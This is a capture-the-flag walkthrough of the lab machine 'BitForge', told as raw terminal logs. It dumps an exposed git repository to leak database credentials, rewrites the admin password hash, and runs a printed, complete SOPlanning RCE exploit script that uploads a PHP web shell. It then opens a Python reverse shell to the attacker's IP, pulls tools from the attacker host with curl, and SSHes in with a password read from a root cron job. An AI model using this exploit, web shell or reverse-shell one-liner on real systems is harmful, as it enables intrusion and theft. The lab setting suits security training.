BitForge

Enumeration:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.135.186
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 12:05 EST
Nmap scan report for 192.168.135.186
Host is up, received echo-reply ttl 61 (0.20s latency).
Scanned at 2025-11-15 12:05:11 EST for 50s
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE    REASON         VERSION
22/tcp   open   ssh        syn-ack ttl 61 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGT2bbuknyDQCZL8wcewIxfJHCT3ZA9MHovHm5vV8gnY+WaklYD1KkExYX16RT7Du6kDkOd7/VtgT8wyumO7X74=
|   256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9T+RtTpSheh2mjfbGIXvNadPVCLuheP1AqmUPx6yic
80/tcp   open   http       syn-ack ttl 61 Apache httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-git: 
|   192.168.135.186:80/.git/
|     Git repository found!
|     .git/config matched patterns 'user'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: created .env to store the database configuration 
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://bitforge.lab/
3306/tcp open   mysql      syn-ack ttl 61 MySQL 8.0.40-0ubuntu0.24.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.40-0ubuntu0.24.04.1
|   Thread ID: 17
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, InteractiveClient, DontAllowDatabaseTableColumn, SupportsTransactions, ODBCClient, LongColumnFlag, SupportsCompre
ssion, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, LongPassword, ConnectWithDatabase, SupportsLoadDataLocal, IgnoreSigpipes, Su
pportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: FMMk!\x10b\x18>Q.wDQ_Tnoq-
|_  Auth Plugin Name: caching_sha2_password 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.40_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_8.0.40_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-15T14:38:11
| Not valid after:  2035-01-13T14:38:11
| MD5:   6ffd:19b3:1593:91e3:ca5f:95c7:4224:8213
| SHA-1: 5a03:d302:2473:ec92:5347:eaca:48cf:80ea:90c3:2a64
| -----BEGIN CERTIFICATE-----
| MIIDBzCCAe+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADA8MTowOAYDVQQDDDFNeVNR
<snipped>
| H2kcLkCMSfA/PHE=
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

HTTP (80):

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ cat /etc/hosts        
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

192.168.135.186 bitforge.lab

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

192.168.135.186 bitforge.lab plan.bitforge.lab

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ mysql -h 192.168.135.186 -u root   
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ mysql -h 192.168.135.186 -u root --skip-ssl
ERROR 1045 (28000): Access denied for user 'root'@'192.168.45.170' (using password: NO)

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ mysql -h 192.168.135.186 -u root --skip-ssl -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.45.170' (using password: NO)

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ searchsploit  Simple Online Planning 1.52.01  
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)                                            | php/webapps/52082.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ searchsploit -m php/webapps/52082.py   
  Exploit: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
      URL: https://www.exploit-db.com/exploits/52082
     Path: /usr/share/exploitdb/exploits/php/webapps/52082.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/BitForge/52082.py

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ cat 52082.py  
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
# Date: 6th October, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee 
# Version: 1.52.01
# Tested on: Ubuntu

import argparse
import requests
import random
import string
import urllib.parse

def command_shell(exploit_url):
    commands = input("soplaning:~$ ")
    encoded_command = urllib.parse.quote_plus(commands)

    command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
    if command_res.status_code == 200:
        print(f"{command_res.text}")
        return
    print(f"Error: An erros occured while running command: {encoded_command}")

def exploit(username, password, url):
    target_url = f"{url}/process/login.php" 
    upload_url = f"{url}/process/upload.php"
    link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
    php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"

    login_data = {"login":username,"password":password}
    res = requests.post(target_url, data=login_data, allow_redirects=False)

    cookies = res.cookies

    multipart_form_data = {
        "linkid": link_id,
        "periodeid": 0,
        "fichiers": php_filename,
        "type": "upload"
    }

    web_shell = "<?php system($_GET['cmd']); ?>"

    files = {
    'fichier-0': (php_filename, web_shell, 'application/x-php')
    }
    upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)

    if upload_res.status_code == 200 and "File" in upload_res.text:
        print(f"[+] Uploaded ===> {upload_res.text}")
        print("[+] Exploit completed.")
        exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
        print(f"Access webshell here: {exploit_url}?cmd=<command>")

        if "yes" == input("Do you want an interactive shell? (yes/no) "):
            try:
                while True:
                    command_shell(exploit_url)
            except Exception as e:
                raise(f"Error: {e}")
        else:
            pass


def main():
    parser = argparse.ArgumentParser(prog="SOplanning RCE", \
            usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")

    parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
    parser.add_argument("-u", "--username",type=str,help="username", required=True)
    parser.add_argument("-p", "--password",type=str,help="password", required=True)

    args = parser.parse_args()

    exploit(args.username, args.password, args.target)

main()

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]                             
└─$ gobuster dir -u http://bitforge.lab -w /usr/share/wordlists/dirb/common.txt -x php -t 40                                                                                
===============================================================                                                                                                             
Gobuster v3.8                                                                                                                                                               
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                                                                                                               
===============================================================                                                                                                             
[+] Url:                     http://bitforge.lab                                                                                                                            
[+] Method:                  GET                                                                                                                                            
[+] Threads:                 40                                                                                                                                             
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt                                                                                                           
[+] Negative Status codes:   404                                                                                                                                            
[+] User Agent:              gobuster/3.8                                                                                                                                   
[+] Extensions:              php                                                                                                                                            
[+] Timeout:                 10s                                                                                                                                            
===============================================================                                                                                                             
Starting gobuster in directory enumeration mode                                                                                                                             
===============================================================                                                                                                             
/.htaccess            (Status: 403) [Size: 199]                                                                                                                             
/.git/HEAD            (Status: 200) [Size: 21]                                                                                                                              
/.hta.php             (Status: 403) [Size: 199]                                                                                                                             
/.hta                 (Status: 403) [Size: 199]                                       
/.htaccess.php        (Status: 403) [Size: 199]                                                                                                                             
/.htpasswd            (Status: 403) [Size: 199]                                                                                                                             
/.htpasswd.php        (Status: 403) [Size: 199]                                                                                                                             
/index.php            (Status: 200) [Size: 8904]                                                                                                                            
/index.php            (Status: 200) [Size: 8904]                                                                                                                            
/login.php            (Status: 200) [Size: 5440]                                                                                                                            
/server-status        (Status: 403) [Size: 199]                                                                                                                             
/static               (Status: 301) [Size: 235] [--> http://bitforge.lab/static/]                                                                                           
Progress: 9226 / 9226 (100.00%)                                                                                                                                             
===============================================================                                                                                                             
Finished
===============================================================

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ gobuster dir -u http://plan.bitforge.lab -w /usr/share/wordlists/dirb/common.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://plan.bitforge.lab
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 199]
/.htaccess.php        (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.hta.php             (Status: 403) [Size: 199]
/.htpasswd.php        (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/history              (Status: 301) [Size: 241] [--> http://plan.bitforge.lab/history/]
/holidays             (Status: 301) [Size: 242] [--> http://plan.bitforge.lab/holidays/]
/includes             (Status: 301) [Size: 242] [--> http://plan.bitforge.lab/includes/]
/index.php            (Status: 302) [Size: 0] [--> www/index.php]
/index.php            (Status: 302) [Size: 0] [--> www/index.php]
/phpmailer            (Status: 301) [Size: 243] [--> http://plan.bitforge.lab/phpmailer/]
/server-status        (Status: 403) [Size: 199]
/smarty               (Status: 301) [Size: 240] [--> http://plan.bitforge.lab/smarty/]
/sql                  (Status: 301) [Size: 237] [--> http://plan.bitforge.lab/sql/]
/templates            (Status: 301) [Size: 243] [--> http://plan.bitforge.lab/templates/]
/vendor               (Status: 301) [Size: 240] [--> http://plan.bitforge.lab/vendor/]
/www                  (Status: 301) [Size: 237] [--> http://plan.bitforge.lab/www/]
Progress: 9226 / 9226 (100.00%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ mkdir git                                      

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ python3 /opt/Tools/git-dumper/git_dumper.py http://bitforge.lab git 
[-] Testing http://bitforge.lab/.git/HEAD [200]
[-] Testing http://bitforge.lab/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://bitforge.lab/.git/ [200]
[-] Fetching http://bitforge.lab/.gitignore [404]
[-] http://bitforge.lab/.gitignore responded with status code 404
[-] Fetching http://bitforge.lab/.git/objects/ [200]
[-] Fetching http://bitforge.lab/.git/logs/ [200]
[-] Fetching http://bitforge.lab/.git/refs/ [200]
[-] Fetching http://bitforge.lab/.git/hooks/ [200]
<snipped>
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 3 paths from the index

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ cd git 

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/BitForge/git]
└─$ ls -la
total 32
drwxrwxr-x 3 kali kali 4096 Nov 15 12:27 .
drwxrwxr-x 4 kali kali 4096 Nov 15 12:27 ..
-rw-rw-r-- 1 kali kali    0 Nov 15 12:27 .env
drwxrwxr-x 7 kali kali 4096 Nov 15 12:27 .git
-rw-rw-r-- 1 kali kali 9110 Nov 15 12:27 index.php
-rw-rw-r-- 1 kali kali 5440 Nov 15 12:27 login.php

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/BitForge/git]
└─$ cd .git

┌──(kali㉿kali)-[~/…/Practice/BitForge/git/.git]
└─$ ls -la
total 48
drwxrwxr-x  7 kali kali 4096 Nov 15 12:27 .
drwxrwxr-x  3 kali kali 4096 Nov 15 12:27 ..
-rw-rw-r--  1 kali kali   49 Nov 15 12:27 COMMIT_EDITMSG
-rw-rw-r--  1 kali kali  150 Nov 15 12:27 config
-rw-rw-r--  1 kali kali   73 Nov 15 12:27 description
-rw-rw-r--  1 kali kali   21 Nov 15 12:27 HEAD
drwxrwxr-x  2 kali kali 4096 Nov 15 12:27 hooks
-rw-rw-r--  1 kali kali  281 Nov 15 12:27 index
drwxrwxr-x  2 kali kali 4096 Nov 15 12:27 info
drwxrwxr-x  3 kali kali 4096 Nov 15 12:27 logs
drwxrwxr-x 13 kali kali 4096 Nov 15 12:27 objects
drwxrwxr-x  3 kali kali 4096 Nov 15 12:27 refs

┌──(kali㉿kali)-[~/…/Practice/BitForge/git/.git]
└─$ cat config   
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[user]
        email = mcsam@bitforge.lab
        name = McSam Ardayfio

┌──(kali㉿kali)-[~/…/Practice/BitForge/git/.git]
└─$ git log 
commit 1ce700a508aec3d5e4d4aa1b128a662f2c85f5ad (HEAD -> main)
Author: McSam Ardayfio <mcsam@bitforge.lab> 
Date:   Mon Dec 16 16:44:48 2024 +0000

    created .env to store the database configuration

commit eaf6c81951775e4202e40762b3300cc936cf4df1
Author: McSam Ardayfio <mcsam@bitforge.lab> 
Date:   Mon Dec 16 16:44:05 2024 +0000

    removing db-config due to hard coded credentials

commit 18833b811e967ab8bec631344a6809aa4af59480
Author: McSam Ardayfio <mcsam@bitforge.lab> 
Date:   Mon Dec 16 16:43:08 2024 +0000

    added the database configuration

commit f4f6de69896baa2ecbb1084e604be81343833bfa
Author: McSam Ardayfio <mcsam@bitforge.lab> 
Date:   Mon Dec 16 16:41:54 2024 +0000

    setting up login and index page for the BitForge website
    
┌──(kali㉿kali)-[~/…/Practice/BitForge/git/.git]
└─$ git log | grep commit | cut -d ' ' -f 2 | xargs git show
<snipped>

commit eaf6c81951775e4202e40762b3300cc936cf4df1
Author: McSam Ardayfio <mcsam@bitforge.lab> 
Date:   Mon Dec 16 16:44:05 2024 +0000

    removing db-config due to hard coded credentials

diff --git a/db-config.php b/db-config.php
deleted file mode 100644
index c1d2b96..0000000
--- a/db-config.php
+++ /dev/null
@@ -1,19 +0,0 @@
-<?php
-// Database configuration
-$dbHost = 'localhost'; // Change if your database is hosted elsewhere
-$dbName = 'bitforge_customer_db';
-$username = 'BitForgeAdmin';
-$password = 'B1tForG3S0ftw4r3S0lutions';
-
-try {
-    $dsn = "mysql:host=$dbHost;dbname=$dbName;charset=utf8mb4";
-    $pdo = new PDO($dsn, $username, $password);
-
-    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
-
-    echo "Connected successfully to the database!";
-} catch (PDOException $e) {
-    echo "Connection failed: " . $e->getMessage();
-}
-?>
-

<snipped>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]                                                                                                                   
└─$ mysql -h 192.168.135.186 -u BitForgeAdmin -pB1tForG3S0ftw4r3S0lutions --skip-ssl                                                                                        
Welcome to the MariaDB monitor.  Commands end with ; or \g.                                                                                                                 
Your MySQL connection id is 98                                                                                                                                              
Server version: 8.0.40-0ubuntu0.24.04.1 (Ubuntu)                                                                                                                            
                                                                                                                                                                            
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.                                                                                                        
                                                                                                                                                                            
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.                                                                                              
                                                                                                                                                                            
MySQL [(none)]> show databases;                                                       
+----------------------+                                                                                                                                                    
| Database             |                                                                                                                                                    
+----------------------+                                                                                                                                                    
| bitforge_customer_db |                                                              
| information_schema   |                                                              
| performance_schema   |                                                                                                                                                    
| soplanning           |                                                                                                                                                    
+----------------------+                                                                                                                                                    
4 rows in set (0.332 sec)                                                                                                                                                   
                                                                                                                                                                            
MySQL [(none)]> use bitforge_customer_db;                                                                                                                                     

Database changed
MySQL [bitforge_customer_db]> show tables;
Empty set (0.329 sec)

MySQL [(none)]> use soplanning
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [soplanning]> show tables;
+----------------------------+
| Tables_in_soplanning       |
+----------------------------+
| planning_audit             |
| planning_config            |
| planning_ferie             |
| planning_groupe            |
| planning_lieu              |
| planning_periode           |
| planning_projet            |
| planning_projet_user_tarif |
| planning_ressource         |
| planning_right_on_user     |
| planning_status            |
| planning_user              |
| planning_user_groupe       |
+----------------------------+
13 rows in set (0.247 sec)

MySQL [soplanning]> desc planning_user;
+----------------------+--------------------+------+-----+---------+-------+
| Field                | Type               | Null | Key | Default | Extra |
+----------------------+--------------------+------+-----+---------+-------+
| user_id              | varchar(20)        | NO   | PRI |         |       |
| user_groupe_id       | int                | YES  | MUL | NULL    |       |
| nom                  | varchar(50)        | NO   |     |         |       |
| login                | varchar(100)       | YES  |     | NULL    |       |
| password             | varchar(50)        | YES  |     | NULL    |       |
| email                | varchar(255)       | YES  |     | NULL    |       |
| visible_planning     | enum('oui','non')  | NO   |     | oui     |       |
| couleur              | varchar(6)         | YES  |     | NULL    |       |
| droits               | text               | YES  |     | NULL    |       |
| cle                  | varchar(40)        | NO   |     |         |       |
| notifications        | enum('oui','non')  | NO   |     | non     |       |
| adresse              | varchar(255)       | YES  |     | NULL    |       |
| telephone            | varchar(20)        | YES  |     | NULL    |       |
| mobile               | varchar(20)        | YES  |     | NULL    |       |
| metier               | varchar(50)        | YES  |     | NULL    |       |
| commentaire          | varchar(255)       | YES  |     | NULL    |       |
| date_dernier_login   | datetime           | YES  |     | NULL    |       |
| preferences          | text               | YES  |     | NULL    |       |
| login_actif          | enum('oui','non')  | NO   |     | oui     |       |
| google_2fa           | enum('setup','ok') | NO   |     | setup   |       |
| date_creation        | datetime           | YES  |     | NULL    |       |
| date_modif           | datetime           | YES  |     | NULL    |       |
| tutoriel             | varchar(255)       | YES  |     | NULL    |       |
| tarif_horaire_defaut | float              | YES  |     | NULL    |       |
+----------------------+--------------------+------+-----+---------+-------+
24 rows in set (0.219 sec)

MySQL [soplanning]> select login,password from planning_user;
+-------+------------------------------------------+
| login | password                                 |
+-------+------------------------------------------+
| admin | 77ba9273d4bcfa9387ae8652377f4c189e5a47ee |
| NULL  | NULL                                     |
| NULL  | NULL                                     |
| NULL  | NULL                                     |
| NULL  | NULL                                     |
+-------+------------------------------------------+
5 rows in set (0.341 sec)

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ haiti '77ba9273d4bcfa9387ae8652377f4c189e5a47ee'
SHA-1 [HC: 100] [JtR: raw-sha1]
RIPEMD-160 [HC: 6000] [JtR: ripemd-160]
Double SHA-1 [HC: 4500]
Ruby on Rails Restful Auth (one round, no sitekey) [HC: 27200]
MySQL5.x [HC: 300] [JtR: mysql-sha1]
MySQL4.1 [HC: 300] [JtR: mysql-sha1]
Umbraco HMAC-SHA1 [HC: 24800]
WPA-EAPOL-PBKDF2 [HC: 2500]
WPA-EAPOL-PMK [HC: 2501]
Haval-160 (3 rounds) [JtR: dynamic_190]
Haval-160 (4 rounds) [JtR: dynamic_200]
Haval-160 (5 rounds) [JtR: dynamic_210]
HAS-160
LinkedIn [HC: 190] [JtR: raw-sha1-linkedin]
Skein-256(160)
Skein-512(160)

GitHub - Worteks/soplanning: Fork of SO PlanningGitHub

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ git clone https://github.com/Worteks/soplanning.git
Cloning into 'soplanning'...
remote: Enumerating objects: 5889, done.
remote: Counting objects: 100% (5889/5889), done.
remote: Compressing objects: 100% (4111/4111), done.
remote: Total 5889 (delta 2073), reused 5403 (delta 1597), pack-reused 0 (from 0)
Receiving objects: 100% (5889/5889), 25.72 MiB | 5.68 MiB/s, done.
Resolving deltas: 100% (2073/2073), done.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]                                                                                                                   
└─$ grep 'hashpassword' -inR . -B 5 -A 5 -a                                                                                                                                 
./soplanning/includes/class_user.inc-361-               $check->db_load(array('login', '=', $this->login, 'user_id', '<>', $this->user_id));                                
./soplanning/includes/class_user.inc-362-               if($check->getCount() > 0){                                                                                         
./soplanning/includes/class_user.inc-363-                       throw new BadInputException('Existing login, cant be used twice');                                          
./soplanning/includes/class_user.inc-364-               }                                                                                                                   
./soplanning/includes/class_user.inc-365-               if(trim($password) != ''){                                                                                          
./soplanning/includes/class_user.inc:366:                       $this->password = $this->hashPassword(trim($password));                                                     
./soplanning/includes/class_user.inc-367-               }                                                                                                                   
./soplanning/includes/class_user.inc-368-               $this->visible_planning = (trim($visible) == 0 ? 'non' : 'oui');                                                    
./soplanning/includes/class_user.inc-369-               if(trim($color) != ''){                                                                                             
./soplanning/includes/class_user.inc-370-                       $this->couleur = trim($color);                                                                              
./soplanning/includes/class_user.inc-371-               }                                                                                                                   
--                                                                                                                                                                          
./soplanning/includes/class_user.inc-396-                       $redirect = 'planning.php';                                                                                 
./soplanning/includes/class_user.inc-397-               }                                                                                                                   
./soplanning/includes/class_user.inc-398-               return $redirect;                                                                                                   
./soplanning/includes/class_user.inc-399-       }                                                                                                                           
./soplanning/includes/class_user.inc-400-                                                                                                                                   
./soplanning/includes/class_user.inc:401:       public function hashPassword($password){                                                                                    
./soplanning/includes/class_user.inc-402-               return sha1("" . $password . "");                                                                                   
./soplanning/includes/class_user.inc-403-       }                                                                                                                           
./soplanning/includes/class_user.inc-404-                                                                                                                                   
./soplanning/includes/class_user.inc-405-       public function peutGererTache($objTache){                                                                                  
./soplanning/includes/class_user.inc-406-               $projet = new Projet();
<snipped>

MySQL [soplanning]> select user();                                                                                                                                          
+------------------------------+                                                                                                                                            
| user()                       |                                                                                                                                            
+------------------------------+                                                                                                                                            
| BitForgeAdmin@192.168.45.170 |                                                                                                                                            
+------------------------------+                                                                                                                                            
1 row in set (0.216 sec)                                                              

MySQL [soplanning]> select current_user();
+-----------------+
| current_user()  |
+-----------------+
| BitForgeAdmin@% |
+-----------------+
1 row in set (0.287 sec)

MySQL [soplanning]> show grants;
+-------------------------------------------------------------------------+
| Grants for BitForgeAdmin@%                                              |
+-------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO `BitForgeAdmin`@`%`                               |
| GRANT ALL PRIVILEGES ON `soplanning`.* TO `BitForgeAdmin`@`%`           |
| GRANT ALL PRIVILEGES ON `bitforge_customer_db`.* TO `BitForgeAdmin`@`%` |
+-------------------------------------------------------------------------+
3 rows in set (0.215 sec)

MySQL [soplanning]> UPDATE planning_user SET password="99895583fc06d760a6425242b0061ec9e61db66e" WHERE user_id="ADM";
Query OK, 1 row affected (0.278 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Exploitation:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ python3 52082.py
usage: python3 52082.py -t http://example.com:9090 -u admin -p admin
SOplanning RCE: error: the following arguments are required: -t/--target, -u/--username, -p/--password

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ nc -nlvp 80
listening on [any] 80 ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ python3 52082.py -t http://plan.bitforge.lab/www -u admin -p admin
[+] Uploaded ===> File 'uqx.php' was added to the task !
[+] Exploit completed.
Access webshell here: http://plan.bitforge.lab/www/upload/files/nqwsb3/uqx.php?cmd=<command>
Do you want an interactive shell? (yes/no) yes
soplaning:~$ which python3                                                                                                                                                  
/usr/bin/python3                                                                                                                                                            
                                                                                                                                                                            
soplaning:~$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.170",80));os.dup2(s.fileno(),0); os.dup2(s.fi
leno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.170] from (UNKNOWN) [192.168.135.186] 41744
<.bitforge.lab/public_html/www/upload/files/vlj1k8$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<.bitforge.lab/public_html/www/upload/files/vlj1k8$ export TERM=xterm
www-data@BitForge:/var/www/plan.bitforge.lab/public_html/www/upload/files/vlj1k8$ ^Z
zsh: suspended  nc -nlvp 80

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ stty raw -echo ; fg
[1]  + continued  nc -nlvp 80

www-data@BitForge:/var/www/plan.bitforge.lab/public_html/www/upload/files/vlj1k8$ stty rows 41 columns 172
www-data@BitForge:/var/www/plan.bitforge.lab/public_html/www/upload/files/vlj1k8$

Post-Exploitation:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

/var/www/plan.bitforge.lab/public_html/www/upload/files/vlj1k8$ cd /dev/shm
www-data@BitForge:/dev/shm$ curl http://192.168.45.170/pspy64 -o pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3032k  100 3032k    0     0   290k      0  0:00:10  0:00:10 --:--:--  365k
www-data@BitForge:/dev/shm$ ls -la
total 3984
drwxrwxrwt  2 root     root          80 Nov 15 18:35 .
drwxr-xr-x 19 root     root        4040 Jan 16  2025 ..
-rwxr-xr-x  1 www-data www-data  971926 Nov 15 18:22 linpeas.sh
-rw-r--r--  1 www-data www-data 3104768 Nov 15 18:35 pspy64
www-data@BitForge:/dev/shm$ chmod +x pspy64
www-data@BitForge:/dev/shm$ ./pspy64

www-data@BitForge:/dev/shm$ ./pspy64                                                                                                                                        
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d                                                                                               


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░     
                               
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/u
sr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/11/15 18:35:38 CMD: UID=33    PID=32921  | ./pspy64
<snipped>
2025/11/15 18:37:01 CMD: UID=0     PID=32940  | /bin/sh -c mysqldump -u jack -p'j4cKF0rg3@445' soplanning >> /opt/backup/soplanning_dump.log 2>&1
<snipped>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ nxc ssh 192.168.135.186 -u jack -p 'j4cKF0rg3@445'    
SSH         192.168.135.186 22     192.168.135.186  [*] SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.5
SSH         192.168.135.186 22     192.168.135.186  [+] jack:j4cKF0rg3@445 (Pwn3d!) Linux - Shell access!

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/BitForge]
└─$ ssh jack@bitforge.lab  
The authenticity of host 'bitforge.lab (192.168.135.186)' can't be established.
ED25519 key fingerprint is: SHA256:GYats4sApIm2CiXiv6CqklOr+LDIDCrer/01h6J9yFg
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bitforge.lab' (ED25519) to the list of known hosts.
jack@bitforge.lab's password: j4cKF0rg3@445
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Nov 15 06:37:38 PM UTC 2025

  System load:  0.04              Processes:               180
  Usage of /:   55.5% of 9.75GB   Users logged in:         0
  Memory usage: 49%               IPv4 address for ens192: 192.168.135.186
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

78 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

jack@BitForge:~$ sudo -l
